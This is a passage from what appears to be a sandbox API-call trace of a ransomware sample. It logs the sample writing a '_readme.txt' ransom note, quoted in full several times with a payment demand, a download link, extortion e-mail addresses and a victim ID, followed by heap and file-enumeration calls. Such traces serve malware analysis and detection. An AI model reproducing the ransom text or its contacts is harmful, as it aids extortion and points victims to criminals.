tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.654] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.654] CreateFileW (lpFileName="C:\\Config.Msi\\_readme.txt" (normalized: "c:\\config.msi\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.655] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.655] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.656] CloseHandle (hObject=0x6f0) returned 1 [0142.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1550 [0142.656] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc8a1c5f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a1c5f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1550 | out: hHeap=0x620000) returned 1 [0142.657] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc8a1c5f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a1c5f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.657] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a1c5f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a1c5f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a1c5f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.657] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8a1c5f0, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8a1c5f0, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8a1c5f0, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.657] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283bf8 [0142.657] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3283fa0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283fa0 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3283bf8 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.658] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1f28 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1f28 [0142.660] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac16e0 | out: hHeap=0x620000) returned 1 [0142.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac16e0 